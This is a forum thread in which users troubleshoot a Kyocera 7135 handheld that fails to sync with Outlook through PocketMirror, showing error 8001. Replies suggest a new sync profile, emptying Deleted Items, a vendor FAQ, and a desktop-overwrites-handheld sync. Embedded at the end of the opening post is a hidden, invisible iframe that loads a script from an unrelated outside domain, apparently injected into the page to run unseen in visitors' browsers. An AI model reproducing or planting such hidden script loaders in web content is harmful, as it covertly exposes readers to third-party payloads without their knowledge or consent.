+ Reply to Thread

7135 and Outlook Sync Problem

ERROR: 00008001
    Unable to communicate with Outlook's OLE Automation interface.

714: PMirror

Outlook Calendar synchronization failed

All was ok until my 2 week old 7135 crashed and needed to reset. Now, all outlook contacts are gone and I can't pull from my pc. message shows as above.

I tried un-installing palm and pocketmirror on desktop and reinstalling and still no luck. Loaded Microsoft software and tried to "repair" Windows Outlookand the same message. Does anyone have any suggestions?

I tried search function and didn't see a similar problem though tried the reset and reinstall. Any help or ideas are appreciated. Thanks in advance. Joe<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: 7135 and Outlook Sync Problem

Originally posted by salesguy
    ERROR: 00008001
    Unable to communicate with Outlook's OLE Automation interface.

714: PMirror

Outlook Calendar synchronization failed

All was ok until my 2 week old 7135 crashed and needed to reset. Now, all outlook contacts are gone and I can't pull from my pc. message shows as above.

I tried un-installing palm and pocketmirror on desktop and reinstalling and still no luck. Loaded Microsoft software and tried to "repair" Windows Outlookand the same message. Does anyone have any suggestions?

I tried search function and didn't see a similar problem though tried the reset and reinstall. Any help or ideas are appreciated. Thanks in advance. Joe
    salesguy: Wish I could help you but I have not had that problem. Did you think about establishing a new sync name and maybe trying all over again? I sync to my computer at work (using outlook) and to my computer at home (using the Kyocera desktop software) and so far I haven't had a problem. I know that there is a lot of info on these boards as well as the couple of manuals that are on the software that comes with the 7135 or on the Kyocera website. Good luck and I'll watch the replies to save in case I have that problem. ---dmiowa

dmiowa, thanks bud. saw something on another forum about messages like this with outlook express vs regular outlook. trying to remove my express and load outlook and see if it help. thx. joe

Originally posted by salesguy
    dmiowa, thanks bud. saw something on another forum about messages like this with outlook express vs regular outlook. trying to remove my express and load outlook and see if it help. thx. joe
    Were you able to resolve your problem? I upgraded to Outlook 2003 recently, and am getting the same error.

Perhaps the "deleted items" folder in Outlook is full. Try and empty the folder then resync.

I had a similar problem in the past. Not sure if it was the same error message though. - Just trying to help.

Originally posted by SmartDevil
    Perhaps the "deleted items" folder in Outlook is full. Try and empty the folder then resync.

I had a similar problem in the past. Not sure if it was the same error message though. - Just trying to help.
    Thanks for your reply, SmartDevil. Unfortunately, my "Deleted Items" folder is empty, so it didn't help. I went ahead and uninstalled Pocket Mirror so that my data gets backed up on the Palm Desktop. However, I've got very used to using Outlook for organizing, so I would really appreciate it if anyone could suggest a solution. (By the way, what's with the three- step navigation to reach Outlook Today? Anybody know a shortcut?)

From Chapura's website - FAQ:

Error 8001: Unable to Communicate with Outlook's OLE Automation Interface...

You can view this answer at
    http://chapura.custhelp.com/cgi-bin/...ated=984587257

Good luck!
    Rick

"Life is not a journey to the grave with the intention of arriving safely in a pretty and well preserved body, but rather to skid in broadside, thoroughly used up, totally worn out, and loudly proclaiming -- WOW -- What a Ride!"

I had a similar problem, but without that error message and here's what worked great:

Since Outlook has everything that you want on your Palm, click custom in the hotsync setup and have the desktop overwrite the handheld this time.

Since you are not syncing, the data will be pushed to your Palm, and anything that may have been bad data is overwritten.

I had this problem with iambic mail last week, could not get it to sync, performed the desktop overwrites handheld, and voi la!

Good luck.

-Patrick
    Need gift ideas?

Check out http://www.mynextclick.com